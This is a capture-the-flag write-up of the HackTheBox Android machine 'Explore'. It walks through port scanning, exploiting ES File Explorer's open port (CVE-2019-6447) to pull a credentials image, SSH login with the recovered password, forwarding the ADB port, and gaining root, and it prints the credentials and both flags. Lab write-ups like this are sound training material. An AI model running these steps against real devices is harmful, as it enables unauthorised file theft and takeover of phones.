HTB - EXPLORE (Android-Machine)

Enumeration

Machine IP

export IP=10.10.10.247

Nmap Scan Results

Nmap May take some time to sacn all 65535 ports
So we will use RUSTSCAN
Using Rustscan to Find all open ports rustscan -a 10.10.10.247

Open 10.10.10.247:2222
Open 10.10.10.247:37721
Open 10.10.10.247:59777

Now Use NMAP to scan these Open Ports nmap -p 2222,37721,59777 10.10.10.247 -vvv -sV -A -sC

PORT      STATE SERVICE REASON         VERSION
2222/tcp  open  ssh     syn-ack ttl 63 (protocol 2.0)
| fingerprint-strings: 
|   NULL: 
|_    SSH-2.0-SSH Server - Banana Studio
| ssh-hostkey: 
|   2048 71:90:e3:a7:c9:5d:83:66:34:88:3d:eb:b4:c7:88:fb (RSA)
|_ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCqK2WZkEVE0CPTPpWoyDKZkHVrmffyDgcNNVK3PkamKs3M8tyqeFBivz4o8i9Ai8UlrVZ8mztI3qb+cHCdLMDpaO0ghf/50qYVGH4gU5vuVN0tbBJAR67ot4U+7WCcdh4sZHX5NNatyE36wpKj9t7n2XpEmIYda4CEIeUOy2Mm3Es+GD0AAUl8xG4uMYd2rdrJrrO1p15PO97/1ebsTH6SgFz3qjZvSirpom62WmmMbfRvJtNFiNJRydDpJvag2urk16GM9a0buF4h1JCGwMHxpSY05aKQLo8shdb9SxJRa9lMu3g2zgiDAmBCoKjsiPnuyWW+8G7Vz7X6nJC87KpL
37721/tcp open  unknown syn-ack ttl 63
| fingerprint-strings: 
|   GenericLines: 
|     HTTP/1.0 400 Bad Request
|     Date: Sat, 11 Sep 2021 12:57:56 GMT
|     Content-Length: 22
|     Content-Type: text/plain; charset=US-ASCII
|     Connection: Close
|     Invalid request line:
|   GetRequest: 
|     HTTP/1.1 412 Precondition Failed
|     Date: Sat, 11 Sep 2021 12:57:56 GMT
|     Content-Length: 0
|   HTTPOptions: 
|     HTTP/1.0 501 Not Implemented
|     Date: Sat, 11 Sep 2021 12:58:02 GMT
|     Content-Length: 29
|     Content-Type: text/plain; charset=US-ASCII
|     Connection: Close
|     Method not supported: OPTIONS
|   Help: 
|     HTTP/1.0 400 Bad Request
|     Date: Sat, 11 Sep 2021 12:58:20 GMT
|     Content-Length: 26
|     Content-Type: text/plain; charset=US-ASCII
|     Connection: Close
|     Invalid request line: HELP
|   RTSPRequest: 
|     HTTP/1.0 400 Bad Request
|     Date: Sat, 11 Sep 2021 12:58:02 GMT
|     Content-Length: 39
|     Content-Type: text/plain; charset=US-ASCII
|     Connection: Close
|     valid protocol version: RTSP/1.0
|   SSLSessionReq: 
|     HTTP/1.0 400 Bad Request
|     Date: Sat, 11 Sep 2021 12:58:20 GMT
|     Content-Length: 73
|     Content-Type: text/plain; charset=US-ASCII
|     Connection: Close
|     Invalid request line: 
|     ?G???,???`~?
|     ??{????w????<=?o?
|   TLSSessionReq: 
|     HTTP/1.0 400 Bad Request
|     Date: Sat, 11 Sep 2021 12:58:21 GMT
|     Content-Length: 71
|     Content-Type: text/plain; charset=US-ASCII
|     Connection: Close
|     Invalid request line: 
|     ??random1random2random3random4
|   TerminalServerCookie: 
|     HTTP/1.0 400 Bad Request
|     Date: Sat, 11 Sep 2021 12:58:21 GMT
|     Content-Length: 54
|     Content-Type: text/plain; charset=US-ASCII
|     Connection: Close
|     Invalid request line: 
|_    Cookie: mstshash=nmap
59777/tcp open  http    syn-ack ttl 63 Bukkit JSONAPI httpd for Minecraft game server 3.6.0 or older
|_http-title: Site doesn't have a title (text/plain).


PORT      STATE SERVICE REASON         VERSION
2222/tcp  open  ssh     syn-ack ttl 63 (protocol 2.0)/SSH-2.0-SSH Server - Banana Studio
59777/tcp open  http    syn-ack ttl 63 Bukkit JSONAPI httpd for Minecraft game server 3.6.0 or older
37721/tcp open  unknown syn-ack ttl 63

Using the NMAP OS detection We can also figure out its an ANDROID MACHINE
We have Found that Port 2222 is running a SSH Server

EXPLOITATION

After further research about port 59777 on android devices , we found a CVE
59777 is an Open port on ES FILE EXPLORER and Vulnerable to CVE-2019-6447
We can find the exploit for this CVE on github or exploit-db

https://www.exploit-db.com/exploits/50070

https://github.com/fs0c131y/ESFileExplorerOpenPortVuln

We will use Exploit-DB Exploit Code.

python3 exploit.py listFiles 10.10.10.247

It will list all the files present, Nothing interesting here
Let’s Try to check the available Pictures

python3 exploit.py listPics 10.10.10.247

==================================================================
|    ES File Explorer Open Port Vulnerability : CVE-2019-6447    |
|                Coded By : Nehal a.k.a PwnerSec                 |
==================================================================

name : concept.jpg
time : 4/21/21 02:38:08 AM
location : /storage/emulated/0/DCIM/concept.jpg
size : 135.33 KB (138,573 Bytes)

name : anc.png
time : 4/21/21 02:37:50 AM
location : /storage/emulated/0/DCIM/anc.png
size : 6.24 KB (6,392 Bytes)

name : creds.jpg
time : 4/21/21 02:38:18 AM
location : /storage/emulated/0/DCIM/creds.jpg
size : 1.14 MB (1,200,401 Bytes)

name : 224_anc.png
time : 4/21/21 02:37:21 AM
location : /storage/emulated/0/DCIM/224_anc.png
size : 124.88 KB (127,876 Bytes)

Found a interesting File creds.jpg
Lets get this file.

└─# python3 exploit.py getFile 10.10.10.247 /storage/emulated/0/DCIM/creds.jpg 

==================================================================
|    ES File Explorer Open Port Vulnerability : CVE-2019-6447    |
|                Coded By : Nehal a.k.a PwnerSec                 |
==================================================================


[+] Downloading file...
[+] Done. Saved as `out.dat`.

mv out.dat creds.jpg

Looks like this image contains the SSH Username And Credentials

kristi:Kr1sT!5h@Rp3xPl0r3!

GETTING USER ACCESS / USER FLAG

Let’s SSH into the machine

ssh [email protected] -p 2222

We can find the User Flag at /sdcard/user.txt

f32017174c7c7e8f50c6da52891ae250

PRIVILEDGE ESCALATION

Further Enumerating the user we have found that some Localhost Ports are running
Listing all Open Ports netstat -a

130|:/sdcard $ netstat -a                                                      
Active Internet connections (established and servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State      
tcp6       0      0 localhost:37509         :::*                    LISTEN     
tcp6       0      0 ::ffff:10.10.10.2:38989 :::*                    LISTEN     
tcp6       0      0 :::2222                 :::*                    LISTEN     
tcp6       0      0 :::5555                 :::*                    LISTEN     
tcp6       0      0 :::42135                :::*                    LISTEN     
tcp6       0      0 :::59777                :::*                    LISTEN

Further researching , we found that PORT 5555 is ADB PORT, To access the Machine using ADB.
We can Forward this USER MACHINE local port to our Attacker Machine using SSH PORT FORWARDING, as We already have access to SSH Credentials.

SSH PORT FORWARDING

Using Command ssh [email protected] -L 5555:localhost:5555 -p 2222

Now Lets Connect to the PORT:5555 , Using ADB

adb connect localhost:5555

List Connected Devices

adb devices

Getting a Shell

adb shell
OR 
adb -s emulator-5554 shell

Getting root Access and getting Root Flag

su

cat /data/root.txt

Root Flag

f04fc82b6d49b41c9b08982be59338c5

<3 EXPLORE HAS BEEN PWNED!

HackTheBox: Explore

HTB - EXPLORE (Android-Machine)

Enumeration

Machine IP

Nmap Scan Results

EXPLOITATION

GETTING USER ACCESS / USER FLAG

PRIVILEDGE ESCALATION

SSH PORT FORWARDING

<3 EXPLORE HAS BEEN PWNED!